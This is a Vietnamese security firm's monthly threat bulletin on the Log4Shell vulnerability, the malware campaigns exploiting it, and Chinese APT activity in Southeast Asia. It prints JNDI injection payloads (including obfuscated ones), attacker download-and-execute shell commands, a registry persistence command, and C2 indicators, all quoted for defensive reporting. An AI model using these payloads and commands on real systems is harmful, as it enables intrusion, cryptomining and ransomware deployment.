Thông tin các mối đe dọa bảo mật trong tháng 12 - 2021

Thông tin các mối đe dọa bảo mật trong tháng 12 - 2021

 
Hàng tháng, Chúng tôi - GTSC tổng hợp lại các thông tin về bảo mật về APT, Malware, CVEs và gói gọn nó vào trong một bài tổng hợp.

Các mối đe dọa nâng cao – Advanced Threats

Log4Shell - Lỗ hổng bảo mật nghiêm trọng trong Apacha Log4j (CVE-2021-44228)

Mô tả chung về lỗ hổng

  1. Mô tả chung về lỗ hổng

Ngày 09/12/2021, lỗ hổng 0-day tồn tại trong ApacheTM Log4j đã được công bố trên Twitter cùng với mã khai thác. Ngay sau đó, theo NVD (National Vulnerability Database), lỗ hổng này được đặt định danh là CVE-2021-44228, mức độ nghiêm trọng là Critical với số điểm CVSSv3 là 10/10. Lỗ hổng này ảnh hưởng đến ApacheTM Log4j phiên bản 1.x và tất cả các phiên bản từ 2.0 đến 2.14.1, cho phép kẻ tấn công thực thi mã từ xa mà không cần xác thực (RCE). Theo nhiều báo cáo ghi nhận, lỗ hổng này đang được nhiều nhóm tấn công sử dụng để khai thác. Chen Zhaojun của Alibaba Cloud Security Team được ghi nhận là người đã phát hiện ra lỗ hổng này – lỗ hổng được đánh giá nghiêm trọng nhất trong năm nay.

Sau đó nhà sản xuất phát hành bản cập nhật lên phiên bản 2.15.0 nhằm khắc phục lỗ hổng CVE-2021-44228. Tuy nhiên, trong trường hợp sử dụng non-default Pattern Layout với Context Lookup hoặc Thread Context Map pattern, kẻ tấn công vẫn có thể gửi các dữ liệu độc hại qua JNDI Lookup pattern dẫn tới tấn công từ chối dịch vụ (DOS) - CVE-2021-45046

ApacheTM Log4j là một thư viện ghi log trong Java được phát triển bởi ApacheTM Software Foundation. Hiện nay rất nhiều sản phẩm công nghệ sử dụng Java và hầu như các ứng dụng Java đều sử dụng thư viện Log4j. Do đó lỗ hổng CVE-2021-44228 có thể đang tồn tại rộng rãi trong nhiều ứng dụng phổ biến trên toàn thế giới.

Các phiên bản bị ảnh hưởng bởi lỗ hổng

  1. Các phiên bản bị ảnh hưởng bởi lỗ hổng

Lỗ hổng ảnh hưởng đến tất cả các phiên bản của Log4j từ phiên bản 2.x đến 2.14.1. Đối với phiên bản Log4j 1.x, lỗ hổng chỉ ảnh hưởng khi sử dụng JMS Appenders. Tuy nhiên, phiên bản Log4j 1.x hiện tại không còn được nhà sản xuất hỗ trợ từ tháng 08/2015. Do đó, các phiên bản Log4j 1.x sẽ tồn tại các lỗ hổng RCE khác, ảnh hưởng đến an toàn của hệ thống.

Ngoài ra, các cơ sở hạ tầng khác như máy chủ dịch vụ, máy chủ cơ sở dữ liệu, các thiết bị mạng, v.v… sử dụng kết hợp Java và Log4j đều có nguy cơ tồn tại lỗ hổng bảo mật này.

Sau bản cập nhật 2.15.0, bản cập nhật này tồn tại lỗ hổng mới khiến kẻ tấn công gửi các dữ liệu độc hại nhằm tấn công từ chối dịch vụ (DOS) - CVE-2021-45046.

Cập nhật ngày 17/12/2021: Các chuyên gia bảo mật đã phân tích và phát hiện cách bypass bản cập nhật 2.15.0 để nâng mức độ nghiêm trọng của CVE-2021-45046 từ tấn công từ chối dịch vụ (DOS) với điểm CVSS 3.7 lên thành thực thi mã từ xa (RCE) với điểm CVSS 9.0. Link tham khảo: https://www.lunasec.io/docs/blog/log4j-zero-day-severity-of-cve-2021-45046-increased/

Phân tích chi tiết kỹ thuật

Các vấn đề cơ bản liên quan tới lỗ hổng

Log4j được một số nhà sản xuất sử dụng với mục đích ghi lại thông tin nhật ký, được sử dụng trong nhiều phần mềm phổ biến khác nhau, bao gồm Microfocus, F5, Forescout, Fortinet, Amazon, Apple iCloud, Cisco, Cloudflare, ElasticSearch, Imperva, NetApp, Neo4j, Nutanix, Oracle, Red Hat, Steam, Tesla, Twitter, … và các trò chơi điện tử như Minecraft.

Trong phiên bản 2.0, một package mới được thêm vào Log4j có tên “JNDILookup plugin”. JNDI (Java Naming and Directory Interface) là một Java API cho phép một ứng dụng hay chương trình Java tìm dữ liệu (dưới dang Java Object). Một ứng dụng hay chương trình Java có thể sử dụng JNDI và LDAP để tìm một Java Object chứa dữ liệu mà ứng dụng này cần. Ví dụ, máy chủ LDAP muốn lấy thuộc tính từ một đối tượng. Máy chủ LDAP sẽ sử dụng URL: ldap://localhost:389/o=JNDITutorial để tìm JNDITutorial object từ server chạy trên localhost cổng 389 và đọc các thuộc tính từ đó. Trong trường hợp máy chủ LDAP được đặt ở một máy khác, hoặc sử dụng một cổng khác, thì URL trên sẽ cần phải chỉnh sửa. Tính linh hoạt này dẫn đến lỗ hổng bảo mật nếu kẻ tấn công kiểm soát được LDAP URL, dưới dạng: ${jndi:ldap://evil.com/a}. Trong đó:

  • JNDI: Java Naming and Directory Interface

  • LDAP: là một giao thức, các giao thức khác có thể là ldapsrmidnsiiop hay http. Các giao thức này sẽ đứng trước tên miền của kẻ tấn công.

Khi đó, Log4j sẽ kết nối tới máy chủ LDAP tại evil.com và truy xuất các object. Máy chủ có địa chỉ evil.com này sẽ được kẻ tấn công kiểm soát. Để tránh bị phát hiện, một số kẻ tấn công sử dụng các chuỗi được làm rối (obfuscate) hoặc sử dụng mã hóa base64, ví dụ về mã khai thác bị làm rối (obfuscated payload) như sau:

({jndi:${lower:l}${lower:d}a${lower:p})

(${${::-j}${::-n}${::-d}${::-i})

  1. Điều kiện khai thác lỗi

Lỗ hổng này cho phép kẻ tấn công thực thi lệnh từ xa (RCE) trong trường hợp:

  • Ứng dụng sử dụng Log4j phiên bản từ 2.0 đến 2.14.1, đồng thời, kẻ tấn công có thể điều khiển được logged string truyền vào tại các đoạn ghi log sử dụng Log4j.

  • Tùy thuộc vào phiên bản Java và các thư viện đang sử dụng mà quá trình khai thác khác nhau:

  • Với phiên bản JDK < 6u2117u2018u19111.0.1, kẻ tấn công có thể thực hiện RCE mà không cần thêm các điều kiện khác.

  • Với các phiên bản java (JDK) >= 6u2117u2018u19111.0.1, do thuộc tính “com.sun.jndi.ldap.object.trustURLCodebase” được set “false”, không thể thực hiện load một remote codebase. Thay vào đó, kẻ tấn công sẽ có thể RCE qua Deserialization. Do đó, để RCE thành công sẽ cần thêm điều kiện là ứng dụng có sử dụng thư viện (jar lib) tồn tại gadget chains để RCE (chẳng hạn Commons-Collections 3.1).

Các bước thực hiện tấn công

Bước 1. Dữ liệu được gửi từ phía người dùng đến máy chủ (sử dụng bất kỳ giao thức nào).

Bước 2. Máy chủ ghi lại dữ liệu từ truy vấn trên, truy vấn này có chứa mã khai thác (payload): $ {jndi: ldap: //evil.com/a} (với evil.com là máy chủ do kẻ tấn công kiểm soát).

Bước 3. Thư viện Log4j chứa lỗ hổng xử lý mã khai thác trên, máy chủ sẽ gửi truy vấn tới evil.com thông qua JNDI (Java Naming and Directory Interface).

Bước 4. Phản hồi (response) từ máy chủ chứa một đường dẫn đến file Java Class do kẻ tấn công tạo ra (ví dụ: http://second-stage.evil.com/Exploit.class), file này chứa các đoạn mã độc hại.

Bước 5. Mã khai thác này sẽ được gọi và cho phép kẻ tấn công thực thi mã tùy ý tùy vào từng mã khai thác được sử dụng ở file Java Class trên.

Luồng khai thác lỗ hổng và biện pháp ngăn chặn

Cách thức kiểm tra và phát hiện lỗ hổng

Kiểm tra thông qua ứng dụng web mã nguồn mở có tên CanaryTokens.org (https://canarytokens.org/generate) và lựa chọn Select your Token là Log4Shell để tạo mã khai thác tự động.

Sử dụng các công cụ rà quét các tập tin với phần mở rộng (extension) là .jar và .war trong các ứng dụng của hệ thống liên quan đến Log4j bằng cách rà quét mã băm (hash). Download tại đây: https://github.com/lunasec-io/lunasec/releases/

  • Đối với môi trường OSX và Linux sử dụng câu lệnh sau: log4shell scan your-project-dir/

  • Đối với môi trường Windows sử dụng câu lệnh sau: log4shell.exe scan your-project-dir/

Đối với các sản phẩm bên thứ ba, tùy vào từng nhà sản xuất mà cách thức kiểm tra và phát hiện khác nhau. Chi tiết xem tại đường dẫn:

https://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592

Các công cụ phát hiện lỗ hổng khác:

https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b.

Khuyến nghị, khắc phục lỗ hổng

Tiến hành rà soát, kiểm tra các máy chủ, các ứng dụng bị ảnh hưởng bởi lỗ hổng Log4j, nhanh chóng thực hiện cập nhật lên phiên bản mới nhất hiện tại 2.16.0 (https://logging.apache.org/log4j/2.x/changes-report.html#a2.16.0) 

Trong trường hợp chưa thể thực hiện kịp thời việc cập nhật bản vá:

  • Tiến hành bổ sung các tập luật (rule) phát hiện lỗ hổng đã được công bố bởi các hãng, hoặc các tập luật phát hiện tấn công thông qua tường lửa ứng dụng web (Web Application Firewall) như F5
     (https://support.f5.com/csp/article/K19026212)

  • Nếu đơn vị đang sử dụng Log4j phiên bản từ 2.0-beta9 đến 2.10.0, xóa bỏ class JndiLookup của Log4j khỏi classpath của JVM như sau:
     zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/ JndiLookup.class

  • Nếu đơn vị đang sử dụng Log4j phiên bản từ 2.10 đến 2.14.1, thực hiện cấu hình thuộc tính log4j2.formatMsgNoLookups hoặc biến môi trường LOG4J_FORMAT_MSG_NO_LOOKUPS thành giá trị true.

Các sản phẩm chịu ảnh hưởng bởi lỗ hổng CVE-2021-44228

Hiện nay, một số lượng đáng kể các ứng dụng dựa trên Java đang sử dụng log4j làm tiện ích ghi nhật ký và rất dễ bị tấn công bởi CVE này. Các nhà sản xuất đang cố gắng chạy đua để đưa ra các khuyến nghị và phát hành bản vá cập nhật đến khách hàng. Theo thống kê của tổ chuyên gia, các sản phẩm dưới đây đã có công bố về khả năng tồn tại lỗ hổng CVE-2021-44228.

Hãng

Sản phẩm bị ảnh hưởng

Atlassian

  • Bamboo Server and Data Center

  • Confluence Server and Data Center

  • Crowd Server and Data Center

  • Fisheye / Crucible

  • Jira Server and Data Center

BMC

  • BMC Discovery

  • BMC Client Management

  • Helix Data Manager

  • Remedy Smart Reporting

  • Control-M

  • TrueSightAutomation for Networks

  • TrueSightServer Automation

  • TrueSightAutomation for Servers - Data Warehouse

  • BladelogicDatabase Automation

  • TrueSightSmart Reporting

  • TSOM Smart Reporting

  • KMs - Sybase KM & Linux (RHEV)

  • TrueSightAutomation Console

  • BMC Helix Continuous Optimization (REE)

  • TrueSightInfrastructure Management

  • TrueSightInfrastructure Management: Presentation Server

  • TrueSightIT Data Analytics

  • TrueSightApp Visibility Manager

  • BMC AMI Ops Insight

  • BMC AMI Ops UI

  • BMC AMI Ops Infrastructure (MVI) - CRA component

  • BMC AMI Ops Common Rest API (CRA)

  • MainViewMiddleware Monitor

  • Partner KMs / ETL’s from Sentry Software

Broadcom

  • CA Advanced Authentication

  • Layer7 API Developer Portal

  • Layer7 API Developer Portal SaaS

  • Layer7 API Gateway

  • Layer7 API Creator

  • Symantec SiteMinder (CA Single Sign-on)

  • Symantec PAM Server Control

  • VIP Authentication Hub

*Các sản phẩm sau chưa chứng minh nhưng có thể bị ảnh hưởng:

  • LiveUpdate Administrator (LUA)

  • Symantec Endpoint Protection Manager (SEPM)

  • Email Security Service (ESS)

  • Web Security Service (WSS)

Cisco

  • Cisco Webex Meetings Server

  • Cisco Advanced Web Security Reporting Application

  • Cisco Firepower Threat Defense (FTD) managed by Firepower Device Manager (FDM)

  • Cisco Identity Services Engine (ISE)

  • Cisco CloudCenter Suite Admin

  • Cisco Crosswork Change Automation

  • Cisco Data Center Network Manager (DCNM)

  • Cisco Evolved Programmable Network Manager

  • Cisco Intersight Virtual Appliance

  • Cisco Network Services Orchestrator (NSO)

  • Cisco Nexus Dashboard)

  • Cisco WAN Automation Engine (WAE)

  • Cisco DNA Center

  • Cisco Network Assurance Engine

  • Cisco SD-WAN vManage

  • Cisco Integrated Management Controller (IMC) Supervisor

  • Cisco UCS Director

  • Cisco BroadWorks

  • Cisco Computer Telephony Integration Object Server (CTIOS)

  • Cisco Contact Center Domain Manager (CCDM)

  • Cisco Contact Center Management Portal (CCMP)

  • Cisco Emergency Responder

  • Cisco Enterprise Chat and Email

  • Cisco Finesse

  • Cisco Packaged Contact Center Enterprise

  • Cisco Unified Communications Manager / Cisco Unified Communications Manager Session Management Edition

  • Cisco Unified Communications Manager IM & Presence Service (formerly CUPS)

  • Cisco Unified Contact Center Enterprise - Live Data server

  • Cisco Unified Contact Center Enterprise

  • Cisco Unified Contact Center Express

  • Cisco Unified Intelligent Contact Management Enterprise

  • Cisco Unified SIP Proxy Software

  • Cisco Unity Connection

  • Cisco Video Surveillance Operations Manager

cPanel

  • cPanel Solr

Elastic

  • APM Java Agent (chỉ có thể khai thác khi cấu hình log_level=trace và sử dụng PLAIN_TEXT)

  • Logstash (JDK trước 8u191) tồn tại DOS, không chứa lỗ hổng RCE

Extreme Networks

  • ExtremeCloud IQ Virtual Appliance (IQVA)

  • ExtremeGuest (đang trong quá trình kiểm tra)

  • 200-series (đang trong quá trình kiểm tra)

F5

  • Traffix SDC

Forcepoint

  • ForcepointSecurity Manager

Fortinet

  • FortiAIOps

  • FortiCASB

  • FortiConverter Portal

  • FortiCWP

  • FortiIsolator

  • FortiPortal

  • FortiPolicy

  • FortiSIEM

  • ShieldX

Hewlett Packard Enterprise

  • HP XP Performance Advisor Software All versions

  • HPE SimpliVity 2600 All versions

  • HPE SimpliVity 2600 Gen10 All versions

  • HPE SimpliVity 325 All versions

  • HPE SimpliVity 380 All versions

  • HPE SimpliVity 380 Gen10 All versions

  • HPE SimpliVity 380 Gen10 G All versions

  • HPE SimpliVity 380 Gen10 H All versions

  • HPE SimpliVity 380 Gen9 All versions

  • SimpliVity OmniCube All versions

  • HPE 3PAR Service Processor All versions

  • HPE SANnav Management Software All versions

  • HPE Intelligent Management Center (iMC) All versions

  • HPE Ezmeral Container Platform All versions

  • HPE Ezmeral Data Fabric All versions

  • HPE Real Time Management System (RTMS) All versions

  • HPE Service Director All versions

  • HPE Device Entitlement Gateway (DEG) All versions

  • HPE enhanced Internet Usage Manager (eIUM) All versions

  • HPE Unified Data Management (UDM) All versions

  • HPE StoreServ Management Console (SSMC) All versions

  • HPE Hyper Converged 380 All versions

  • HPE Media Workflow Management (MWM) All versions

  • HPE Universal IoT (UioT) Platform All versions

  • HPE Dragon All versions

  • HPE Telecom Analytics Smart Profile Server (TASPS) All versions

  • HPE Telecommunication Management Information Platform (vTeMIP) All versions

  • HPE Virtual Home Subscriber Server (vHSS) All versions

  • HPE Authentication Server Function (AUSF) All versions

  • HPE 5G Equipment Identity Register (5G-EIR) All versions

  • HPE User Data Repository (UDR) All versions

  • HPE Unstructured Data Storage Function (UDSF) All versions

  • HPE Dynamic SIM Provisioning (DSP) All versions

  • HPE Remote SIM Provisioning Management (RSPM) All versions

  • HPE Service Director (SD) All versions

  • HPE NFV Director (NFVD) All versions

  • HPE Trueview Inventory & Reconciliation (TV) All versions

  • HPE Edge Infrastructure Automation (EIA) All versions

  • HPE Revenue Intelligence All versions

  • NetInsight All versions

  • Shasta Monitoring Framework (SMF) All versions

IBM

  • WebSphere Application Server 8.5, 9.0

McAfee

Các sản phẩm bị ảnh hưởng được McAfee cung cấp tạihttps://kc.mcafee.com/corporate/index?page=content&id=SB10377

Neo4j

  • Neo4j version 4.2+

  • Neo4j Sandbox.

  • Neo4j AuraDB

NetApp

  • Brocade SAN Navigator (SANnav)

  • Cloud Manager

  • ONTAP Tools for VMware vSphere

  • OnCommand Insight

  • SnapCenter Plug-in for VMware vSphere

Nutanix

  • Prism Central

  • File Analytics

Red Hat

  • Red Hat OpenShift Container Platform

RSA

  • SecurID Authentication Manager 8.6 Patch 1

SIEMENS

  • E-Car OC Cloud Application

  • EnergyIP Prepay

  • Industrial Edge Management App (IEM-App)

  • Industrial Edge Management OS (IEM-OS)

  • Industrial Edge Manangement Hub

Solarwinds

  • Server & Application Monitor (SAM)

  • Database Performance Analyzer (DPA)

Sophos

  • Cloud Optix

  • Intercept X Endpoint

  • Intercept X for Server

  • Reflexion

  • SafeGuard Enterprise (SGN)

  • SG UTM

  • SG UTM Manager

  • Sophos Central

  • Sophos Email

  • Sophos Email Appliance (SEA)

  • Sophos Enterprise Console (SEC)

  • Sophos Firewall

  • Sophos Home

  • Sophos Mobile

  • Sophos Mobile EAS Proxy

  • Sophos Web Appliance (SWA)

  • Sophos ZTNA

  • SophosLabs Intelix

Splunk

  • Add-On: Java Management Extensions

  • Add-On: JBoss

  • Add-On: Tomcat

  • Data Stream Processor

  • IT Essentials Work

  • IT Service Intelligence (ITSI)

  • Splunk Connect for Kafka

  • Splunk Enterprise (including instance types like Heavy Forwarders)

  • Splunk Enterprise Amazon Machine Image (AMI)

  • Splunk Enterprise Docker Container

  • Splunk Logging Library for Java

  • Stream Processor Service

SUSE

  • OpenStack Cloud

TP-Link

  • Omada Cloud Services

  • Omada Controller (Windows)

  • Omada Controller (Linux)

  • OC200

  • OC300

Canonical

  • Ubuntu 21.10 (Impish Indri)

  • Ubuntu 21.04 (Hirsute Hippo)

  • Ubuntu 20.04 LTS (Focal Fossa)

  • Ubuntu 18.04 LTS (Bionic Beaver)

Veritas

  • NetBackup Primary Server BYO (also known as Master Server)

  • NetBackup Primary Server

  • NetBackup Appliance - Primary Server same steps as BYO Linux)

  • NetBackup Primary Server container on Flex Appliance

  • NetBackup Resiliency Platform

  • NetBackup CloudPoint

  • Veritas CloudPoint 2.2.2

  • MSDP - Media Server Deduplication Pool on NB Appliance 3.1.2, 3.2

VMware

  • VMware Horizon

  • VMware vCenter Server

  • VMware HCX

  • VMware NSX-T Data Center

  • VMware Unified Access Gateway

  • VMware WorkspaceOne Access

  • VMware Identity Manager

  • VMware vRealize Operations

  • VMware vRealize Operations Cloud Proxy

  • VMware vRealize Automation

  • VMware vRealize Lifecycle Manager

  • VMware Site Recovery Manager, vSphere Replication

  • VMware Carbon Black Cloud Workload Appliance

  • VMware Carbon Black EDR Server

  • VMware Tanzu GemFire

  • VMware Tanzu Greenplum

  • VMware Tanzu Operations Manager

  • VMware Tanzu Application Service for VMs

  • VMware Tanzu Kubernetes Grid Integrated Edition

  • VMware Tanzu Observability by Wavefront Nozzle

  • Healthwatch for Tanzu Application Service

  • Spring Cloud Services for VMware Tanzu

  • Spring Cloud Gateway for VMware Tanzu

  • Spring Cloud Gateway for Kubernetes

  • API Portal for VMware Tanzu

  • Single Sign-On for VMware Tanzu Application Service

  • App Metrics

  • VMware vCenter Cloud Gateway

  • VMware vRealize Orchestrator

  • VMware Cloud Foundation

  • VMware Workspace ONE Access Connector

  • VMware Horizon DaaS

  • VMware Horizon Cloud Connector

  • VMware NSX Data Center for vSphere

  • VMware AppDefense Appliance

  • VMware Cloud Director Object Storage Extension

  • VMware Telco Cloud Operations

  • VMware vRealize Log Insight

  • VMware Tanzu Scheduler

  • VMware Smart Assurance NCM

  • VMware Smart Assurance SAM [Service Assurance Manager]

  • VMware Integrated OpenStack

  • VMware vRealize Business for Cloud

  • VMware vRealize Network Insight

Cập nhật thông tin về thông báo của các hãng về lỗ hổng Log4Shell và các sản phẩm liên quan xem thêm tại link: https://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592

Phát hiện dấu hiệu tấn công sử dụng Log4Shell để cài đặt mã độc trên toàn thế giới

Thông qua các nguồn Threat Intelligence, GTSC tổng hợp lại các sự kiện tấn công khai thác Log4Shell để tiến hành cài đặt mã độc:

Nhóm nghiên cứu Cisco Talos phát hiện các hành vi khai thác lỗ hổng của các nhóm tấn công từ ngày 02/12. Một số trong số đó là việc lợi dụng lỗ hổng để phát tán mã độc, mã khai thác có nhiệm vụ tải xuống các phần mềm độc hại liên quan đến đào tiền điện tử như Kinsing. Mã khai thác được mã hoá base64 nhằm tránh các cơ chế phát hiện. Ngoài ra còn phát hiện các mã độc khác như Mirai hay Mushtik.

Từ ngày 10/12, các nhà nguyên cứu từ Bitdefender đã quan sát đươc nhiều cuộc tấn công vào honeypots lợi dụng lỗ hổng Log4Shell nhằm phát tán mã độc

Mushstik Botnet

File độc hại tại đường dẫn hxxp://45.130.229[.]168:9999/Exploit.class được kẻ tấn công sử dụng để thực thi câu lệnh sau: curl hxxp://18.228.7[.]109/.log/log | sh. Shell script sẽ cố gắng tải nhiều tệp tin với định dạng ELF và thực thi chúng (ELF định dạng file thực thi trong môi trường Linux). Mục đích của các file thực thi này là cài đặt Muhstik botnet và triển khai cryptominer.

Một mẫu Muhstik botnet khác cũng được phát hiện bởi nhóm Netlab. Phiên bản Muhstik này có thêm module backdoor bằng cách tạo thêm SSH public key

ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQBtGZHLQlMLkrONMAChDVPZf…………..+2iSNoFFCeF48JSA2YZvssFOsGuAtV/9uPNQoi9EyvgM2mGDgJ

Sau khi public key được thêm vào ~/.ssh/authorized_keys, kẻ tấn công có thể đăng nhập vào máy của nạn nhân thông qua giao thức SSH mà không cần xác thực mật khẩu. Để đảm bảo backdoor hoạt động trong thời gian dài, kẻ tấn công thiết lập cơ chế cho phép gửi thông tin vị trí và username của victim đến C2 thông qua mạng TOR.

Muhstik’s ELF hỗ trợ DDOS và backdoor command. Ngoài ra mã độc còn sử dụng các command khác như sau:

 

Indicators of Compromise (IoCs):

C2

log.exposedbotnets.ru

URL:

http:[//45.130.229.168:9999/Exploit.class

http:[//18.228.7.109/.log/log

http:[//18.228.7.109/.log/pty1;

http:[//18.228.7.109/.log/pty2;

http:[//18.228.7.109/.log/pty3;

http:[//18.228.7.109/.log/pty4;

http:[//18.228.7.109/.log/pty5;

http:[//210.141.105.67:80/wp-content/themes/twentythirteen/m8

http:[//159.89.182.117/wp-content/themes/twentyseventeen/ldm

XMRIG miner

Dựa vào hê thống EDR, Bitdefender phát hiện tiến trình sử dụng câu lệnh bất thường sau nhằm tải script có tên wsnbb.sh: 

cmd /C "(curl -s hxxp://158.247.218[.]44:8000/wsnbb.sh||wget -q -O- hxxp://154.247.218[.]44:8000/wsnbb.sh) | bash

Script wsnbb.sh có nhiệm vụ triển khai XMRIG miner từ Github:

Một mẫu mã độc được GTSC tổng hợp, mẫu mã độc này cũng được sử dụng với mục đích khai thác tiền điện tử

Thông qua request 'jndi:ldap://45[.]83.193.150:1389/Exploit. Log4J sẽ load và khởi tạo payload độc hại tại 'http://31[.]220.58.29/Exploit.class'. Đoạn code độc hại như sau:

Tùy thuộc vào hệ điều hành và victim đang sử dụng, mã độc sẽ tải và thực thi các payload khác nhau. Với hệ điều hành Windows, powershell sẽ được sử dụng để tải xuống một payload khác tại địa chỉ http://172[.]105.241.146:80/wp-content/themes/twentysixteen/s.cmd. Payload mới này có mục đích thực thi file có tên xmrig.exe

 

Đối với hệ điều hành Linux, mã độc tải xuống và thực thi ELF file tại địa chỉ http://18[.]228.7.109/.log/log

Indicators of Compromise (IOCs)

URL

ldap://45[.]83.193.150

http://31[.]220.58.29

http://172[.]105.241.146

http://18[.]228.7.109

Files (MD5 and SHA256 hashes)

ceb9a55eaa71101f86b14c6b296066c9 pty3

4c97321bcd291d2ca82c68b02cde465371083dace28502b7eb3a88558d7e190c pty3

f6e51ea341570c6e9e4c97aee082822b Exploit.class

eb76b7fb22dd442ba7d5064dce4cec79e6db745ace7019b6dfe5642782bf8660 Exploit.class

c717c47941c150f867ce6a62ed0d2d35 xmrig.exe

e8b2a8d0c3444c53f143d0b4ba87c23dd1b58b03fd0a6b1bcd6e8358e57807f1 xmrig.exe

1718956642fbd382e9cde0c6034f0e21 s.cmd

c70e6f8edfca4be3ca0dc2cfac8fddd14804b7e1e3c496214d09c6798b4620c5 s.cmd

Ransomware

Cũng bắt đầu từ việc khai thác lỗ hổng Log4j hxxp://3.145.115[.]94/Main.class để tải xuống thêm các payload khác. Bitdefender quan sát thấy một mã độc .NET được tải xuống từ địa chỉ hxxp://3.145.115[.]94/zambo/groenhuyzen.exe. Đây là một ransomware mới có tên Khonsari. Sau khi ransomware được thực thi, nó sẽ liệt kê các ổ đĩa trên máy và mã hóa toàn bộ ngoại trừ một số thư mục ở ổ C:\ và các tệp tin có phần mở rộng là .ini và .lnk

C:\Users\<user>\Documents

C:\Users\<user>\Videos

C:\Users\<user>\Pictures

C:\Users\<user>\Downloads

C:\Users\<user>\Desktop

Ransomware sử dụng thuật toán mã hóa AES 128 chế độ CBC. Sau khi mã hóa, phần mở rộng .khonsari được thêm vào mỗi file. Nội dung cảnh báo (ransomware note) sẽ được viết vào file tại đường dẫn C:\Users\<user>\Desktop\HOW TO GET YOUR FILES BACK.TXT và được mở bằng Notepad

Mã độc cũng tạo thêm một GET request tới địa chỉ hxxp://3.145.115[.]94/zambos_caldo_de_p.txt. nhằm mục đích ghi log và giám sát máy nạn nhân

RAT

Cùng với địa chỉ tải xuống ransomware bên trên. Kẻ tấn công tải xuống thêm một payload mới tại địa chỉ hxxp://3.145.115[.]94/Main.class. Main.class tải xuống một payload từ địa chỉ hxxp://test.verble[.]rocks/dorflersaladreviews.jar. .jar , nó được sao chép tới đường dẫn C:\Users\<user>\AppData\Local\Adobe\fengchenteamchina.class và thiết lập persistence thông qua tiến trình reg.exe bằng câu lệnh sau:

reg.exe add "hkcu\software\microsoft\windows\currentversion\run" /v "adobe telemetry agent" /t reg_sz /f /d "c:\program files (x86)\common files\oracle\java\javapath\javaw.exe -jar c:\users\<user>\appdata\local\adobe\fengchenteamchina.class peedee

Payload mới tải xuống một shellcode được gọi bằng tiến trình conhost.exe. Khi đó shellcode được giải mã và thực thi trong bộ nhớ. Shellcode được cho là Orcus RAT, nó sẽ kết nối với C2 có địa chỉ test.verble[.]rocks.

 

 

Các chiến dịch gián điệp mạng của các nhóm APT Trung Quốc nhằm mở rộngtầm ảnh hưởng tại Đông Nam Á

Đội ngũ nghiên cứu Insikt Group của Recorded Future đã đưa ra 1 báo cáo về các chiến dịch gián điệp mạng của các nhóm APT Trung Quốc nhắm đến khu vực Đông Nam Á nhắm thể hiện sức mạnh và gia tăng tầm ảnh hưởng của Trung Quốc lên khu vực này. Trong vòng 9 tháng vừa qua, Insikt Group đã phát hiện hơn 400 máy chủ tại Đông Nam Á có kết nối đến hệ thống máy chủ C&C thuộc các nhóm tấn công đến từ Trung Quốc. Các nhóm tấn công nổi bật bao gồm RedDeltaNaikon và Goblin Panda, bên cạnh đó là 2 nhóm mới được Recorded Future đặt tên TAG-16 và TAG-22, nhắm mục tiêu chính đến 3 quốc gia là Malaysia, Indonesia và Việt Nam.

Số lượng các nạn nhân tại Đông Nam Á bị tấn công bởi các nhóm APT Trung Quốc trong 9 tháng vừa qua

Nhóm TAG-16 tấn công các Chính phủ Đông Nam Á

TAG-16 được đặt tên cho nhóm tấn công mà đội ngũ Recorded Future đã theo dõi và phát hiện ra các hành vi tấn công của nhóm này trong suốt 2021 nhắm đến các văn phòng Thủ tướng, Chính phủ và các cơ quan quân đội của Việt Nam, Malaysia và Phi-líp-pin. Ngoài ra, Recorded Future cũng ghi nhận thêm các nạn nhân khác là các tổ chức đến từ Indonesia và Thái Lan.

- Tháng 11/2020, Bitdefender công bố 1 chiến dịch tấn công của TAG-16 sử dụng các mẫu malware ChinoxyFunnyDream và PCShare backdoors nhắm vào các tổ chức Chính phủ Đông Nam Á

- Tháng 4/2021, Insikt Group thông báo phát hiện các hệ thống của các tổ chức Chính phủ Việt Nam, Malaysia, Indonesia, Thái Lan và Phi-líp-pin có kết nối đến hệ thống C&C của TAG-16. Các mẫu malware tìm được có nhiều điểm tương đồng với FunnyDream backdoor được công bố trước đó bởi Bitdefender và NTT Security.

- Mẫu backdoor SManager được phát hiện và phân tích bởi NTT Security cũng liên quan đến 1 chiến dịch tấn công chuỗi cung ứng (supply chain attack) tại Việt Nam, cụ thể là Cục Chứng thực số và Bảo mật thông tin (VGCA).

- Tháng 6/2021, Insikt Group phát hiện mẫu PCShare loader được sử dụng bởi RedFoxtrot từng được sử dụng bởi TAG-16.

Nhóm TAG-33 tấn công Lào

Tháng 5/2021, đội ngũ Insikt Group phát hiện các hoạt động của 1 nhóm tấn công đến từ Trung Quốc sử dụng Cobalt StrikeShadowPad và Trochilus, tấn công các cơ quan Chính phủ và viễn thông Lào. Tất cả các C&C domains được sử dụng đều được đăng ký qua Namecheap, có tên hoặc chủ đề liên quan đến Lào, trong đó nhiều domains được đăng ký cùng 1 ngày. Các kỹ thuật tấn công này cho thấy sự tương đồng của TAG-33 với nhóm Goblin Panda (tên gọi khác là Conimes và Cycldek).

Nhóm TAG-34 tấn công Campuchia

Tháng 9/2021, Insikt Group phát hiện các hoạt động tấn công xâm nhập của 1 nhóm APT Trung Quốc nhắm đến Bộ Ngoại Giao và cảng biển nước sâu thương mại và quốc tế duy nhất của Campuchia - Sihanoukville Autonomous Port. Báo cáo phân tích cho thấy các hệ thống bị tấn công đều có kết nối với 1 cụm máy chủ C&C ShadowPad trong khoảng từ tháng 6 đến tháng 10/2021. ShadowPad trong những năm gần đây thường được sử dụng rộng rãi bởi các nhóm APT Trung Quốc – qua theo dõi của Insikt Group có ít nhất 7 nhóm khác nhau sử dụng họ malware này.

Indicators of Compromise (IoCs)

TAG-16 Activity

TAG-16 C2 Domains

www.cankerscarcass[.]com

www.appexistence[.]com

www.rninhsss[.]com

www.aexhausts[.]com

ttxs.aexhausts[.]com

cdn.aexhausts[.]com

www.bbranchs[.]com

www.carelessnessing[.]com

www.dexercisep[.]com

www.weekendorg[.]com

www.manaloguek[.]com

www.guardggg[.]com

Recently Active C2 IPs (last 1 month)

150.109.14[.]19

103.198.241[.]11

103.198.241[.]55

103.198.241[.]58

121.78.139[.]168

121.78.139[.]169

154.86.157[.]12

154.86.157[.]15

154.86.157[.]16

154.86.157[.]17

45.197.133[.]23

45.197.133[.]25

45.197.133[.]44

FunnyDream Backdoor Samples

